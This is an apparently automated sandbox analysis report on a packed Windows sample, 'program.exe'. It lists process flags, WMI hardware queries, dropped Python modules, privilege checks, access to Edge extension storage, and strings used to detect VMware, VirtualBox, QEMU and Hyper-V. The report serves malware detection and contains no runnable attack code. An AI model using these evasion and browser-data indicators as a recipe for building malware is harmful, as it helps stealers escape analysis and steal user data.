              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\getmac.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3325
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2838
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2566
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4400
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1619
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4206
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 647
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3642
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1427
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3555
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 657
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2583
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1685
              Source: C:\Users\user\Desktop\program.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73082\unicodedata.pyd
              Source: C:\Users\user\Desktop\program.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73082\_socket.pyd
              Source: C:\Users\user\Desktop\program.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73082\_lzma.pyd
              Source: C:\Users\user\Desktop\program.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73082\_sqlite3.pyd
              Source: C:\Users\user\Desktop\program.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73082\_hashlib.pyd
              Source: C:\Users\user\Desktop\program.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73082\_ssl.pyd
              Source: C:\Users\user\Desktop\program.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73082\_decimal.pyd
              Source: C:\Users\user\Desktop\program.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73082\_queue.pyd
              Source: C:\Users\user\Desktop\program.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73082\select.pyd
              Source: C:\Users\user\Desktop\program.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73082\_bz2.pyd
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tgmup5d5\tgmup5d5.dll
              Source: C:\Users\user\Desktop\program.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73082\python313.dll
              Source: C:\Users\user\Desktop\program.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73082\_ctypes.pyd
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe | Evaded block: after key decision (graph_83-39779)
              Source: C:\Users\user\Desktop\program.exe | Check user administrative privileges: GetTokenInformation, DecisionNodes (graph_0-17526)
              Source: C:\Users\user\Desktop\program.exe | API coverage: 5.6 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7680 | Thread sleep count: 3325 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8056 | Thread sleep time: -13835058055282155s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7740 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7672 | Thread sleep count: 2838 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8068 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7748 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7676 | Thread sleep count: 2566 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8100 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7756 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7404 | Thread sleep count: 315 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6160 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7656 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8500 | Thread sleep time: -15679732462653109s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8368 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5780 | Thread sleep count: 4206 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7408 | Thread sleep count: 647 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7648 | Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7096 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7076 | Thread sleep count: 3642 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8168 | Thread sleep count: 1427 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8176 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6768 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9064 | Thread sleep count: 3555 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9052 | Thread sleep count: 657 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8964 | Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9000 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7788 | Thread sleep count: 2583 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7884 | Thread sleep count: 1685 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4416 | Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7824 | Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
              Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
              Source: C:\Users\user\Desktop\program.exe | Code function: 0_2_00007FF6B75083C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF6B75083C0
              Source: C:\Users\user\Desktop\program.exe | Code function: 0_2_00007FF6B7509280 FindFirstFileExW,FindClose,0_2_00007FF6B7509280
              Source: C:\Users\user\Desktop\program.exe | Code function: 0_2_00007FF6B7521874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF6B7521874
              Source: C:\Users\user\Desktop\program.exe | Code function: 1_2_00007FF6B7509280 FindFirstFileExW,FindClose,1_2_00007FF6B7509280
              Source: C:\Users\user\Desktop\program.exe | Code function: 1_2_00007FF6B7521874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF6B7521874
              Source: C:\Users\user\Desktop\program.exe | Code function: 1_2_00007FF6B75083C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00007FF6B75083C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe | Code function: 83_2_00007FF64FE746EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,83_2_00007FF64FE746EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe | Code function: 83_2_00007FF64FEB88E0 FindFirstFileExA,83_2_00007FF64FEB88E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe | Code function: 83_2_00007FF64FE6E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,83_2_00007FF64FE6E21C
              Source: C:\Users\user\Desktop\program.exe | Code function: 1_2_00007FFE01311230 GetSystemInfo,1_2_00007FFE01311230
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\
              Source: getmac.exe, 00000042.00000003.1833496519.000001556908B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000042.00000003.1833684929.000001556909F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000042.00000002.1834820672.00000155690B3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: fvmwaretray
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vboxservice
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: fvmwareservice
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: Rf8vmware
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmwareuser
              Source: getmac.exe, 00000042.00000003.1833496519.000001556908B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000042.00000003.1833684929.000001556909F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000042.00000002.1834820672.00000155690D1000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000042.00000003.1833659004.00000155690CF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
              Source: program.exe, 00000001.00000002.2105991946.000001B5FE050000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000042.00000003.1833496519.000001556908B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000042.00000003.1833684929.000001556909F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000042.00000002.1834820672.00000155690B3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmsrvc
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: decodeqemu-ga
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: f15vmsrvc
              Source: getmac.exe, 00000042.00000003.1833496519.000001556908B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000042.00000003.1833659004.00000155690CF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExportF*
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmwaretray
              Source: program.exe, 00000001.00000003.1850672429.000001B5FEE1E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2000044221.000001B5FF37B000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1851308309.000001B5FE3D6000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1848691520.000001B5FE3AF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1851854262.000001B5FE3DD000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1850513185.000001B5FF37B000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2000623044.000001B5FF0FC000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2112057477.000001B5FF1CD000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1846023992.000001B5FF1CD000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1852482514.000001B5FEE1F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: f4vmusrvc
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: fvboxtray
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: fvmtoolsd
              Source: getmac.exe, 00000042.00000003.1833496519.000001556908B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000042.00000003.1833684929.000001556909F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-VL
              Source: getmac.exe, 00000042.00000002.1834820672.00000155690D1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport-*
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vboxtray
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: qemu-ga
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmware
